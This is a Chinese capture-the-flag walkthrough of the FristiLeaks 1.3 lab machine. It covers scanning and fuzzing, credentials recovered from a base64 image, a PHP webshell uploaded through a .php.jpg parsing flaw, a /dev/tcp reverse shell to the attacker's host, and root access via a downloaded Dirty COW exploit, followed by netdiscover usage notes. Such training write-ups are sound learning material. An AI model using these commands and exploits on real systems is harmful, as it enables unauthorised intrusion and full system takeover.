漫游 fristileaks-1-3 靶机

Caputure the flag!

实验

ip addr
netdicover -r 192.168.5.0/24

扫描端口
nmap -p- 192.168.5.144

80端口开放，访问web服务
页面只有基本的信息，查看源码也是一样


目录扫描
dirsearch -u 192.168.5.143
dirb -u 192.168.5.143 -w /usr/share/wordlist/dirb/common.txt


依次访问
得到的均是这个图片

可能存在其他路径，进行模糊测试
wfuzz -c -w /usr/share/dirb/wordlists/common.txt -u http://192.168.5.143/FUZZ

这里经过筛选后也没有结果。结合目标机器名称 fristileaks ，我们考虑可能存在与之相关的路径。
结合 fristileaks 生成字典。
这里选择了 Weakpass 在线网站进行生成

现在，利用字典再次模糊测试，筛选结果。
wfuzz -c -w pass1.txt --hc 404 -u http://192.168.5.143/FUZZ

ok，可以看到额外路径 fristi，访问 192.168.5.143/fristi

登录框，burp 弱口令万能密码跑一下

这里最好固定用户名为admin，直接爆破密码，也没结果。

如果是集束炸弹的话，就会相当慢，手动测一下也没有明显的sql注入。
查看页面源代码

eezeepz 就可能是一个用户名，可以再次尝试sql注入和密码爆破，没有结果，是否密码也和 fristi有关呢。
这里直接关注下一个点，就是base64编码的图片。
直接简单搓一个python解码

先写到 txt 文件

再把数据重写到 png 文件

明显，我们得到一组账号和密码
eezeepz
KeKkeKKeKKeKkEkkEk

居然是文件上传，死去的记忆开始攻击我。
顺手上传 php 一句话木马。

直接上传图片，在内容中添加一句话木马和phpinfo。

访问 /uploads/ctf.php.jpg,解析成功

不知道为什么蚁剑没有连上

这次成功连接

虚拟终端反弹shell
/bin/sh -i >& /dev/tcp/192.168.5.138/8999 0>&1
nc -lvnp 8999
使用python获取交互式shell
python -c 'import pty;pty.spawn("/bin/bash")'

查看内核版本
uname -a

查找并利用相关内核漏洞 linux 2.6.32
有很多可利用的攻击，尤其是 Dirty COW 攻击。

下载漏洞，起http服务，下载到目标机，执行

searchsploit -m linux/local/40839.c
cat 40839.c
pyhon -m http.server

cd /tmp
wget 192.168.5.138/40839.c
gcc -pthread 40839.c -o dirty -lcrypt
./dirty
su firefart

现在，根据使用方法，创建用户 firefart 后，我​​们将发出su firefart以将用户帐户更改为 root。

Congratulations on beating FristiLeaks 1.0 by Ar0xA [https://tldr.nu]

I wonder if you beat it in the maximum 4 hours it’s supposed to take!

Shoutout to people of #fristileaks (twitter) and #vulnhub (FreeNode)

flag

Flag: Y0u_kn0w_y0u_l0ve_fr1st1

总结

确定主机ip，扫描端口，访问web服务
扫描web目录，访问并收集敏感信息，并进行路径模糊测试（结合机器名称）
注意查看源码，收集信息并base64解密得到图片，获得一组账号密码
登录后进行文件上传，利用apache解析漏洞 .php.jpg 成功上传，蚁剑连接 getshell
虚拟终端查看内核版本，kali查看对应漏洞的使用方法
起http服务，下载 .c 文件到目标机器，编译运行成功提权。

补充

本实验其实完全可以不用反弹shell，个人感觉在蚁剑虚拟终端完全可以操作


netdiscover
netdiscover 是一个用于网络发现的工具，主要通过 ARP 扫描来发现局域网中的活动主机。它支持主动和被动两种扫描模式。以下是一些常用的 netdiscover 命令及其用法：

基本用法

• 默认扫描：直接输入 netdiscover 命令，它会自动识别网络接口并开始扫描。
• 指定网络接口：使用 -i 选项指定网络接口，例如 netdiscover -i eth0。
• 指定 IP 范围：使用 -r 选项指定要扫描的 IP 范围，例如 netdiscover -r 192.168.1.0/24。

主动扫描

• 快速扫描：使用 -f 选项进行快速扫描，例如 netdiscover -i eth0 -f。
• 设置扫描间隔：使用 -s 选项设置每个 ARP 请求之间的间隔时间，例如 netdiscover -s 0.5。

被动扫描

• 被动模式：使用 -p 选项进行被动扫描，只监听 ARP 流量而不发送任何内容，例如 netdiscover -p。

其他选项

• 输出格式：使用 -P 选项生成适合解析的输出格式，并在扫描完成后停止。
• 持续监听：使用 -L 选项在主动扫描后继续监听 ARP 数据包。

实例

• 扫描指定网卡和 IP 范围：

  netdiscover -i eth0 -r 192.168.1.0/24
  

• 快速扫描常用局域网地址：

  netdiscover -i eth0 -f
  

• 被动扫描并输出结果：

  netdiscover -p
  

这些命令可以帮助你在 Kali Linux 中使用 netdiscover 进行有效的网络发现。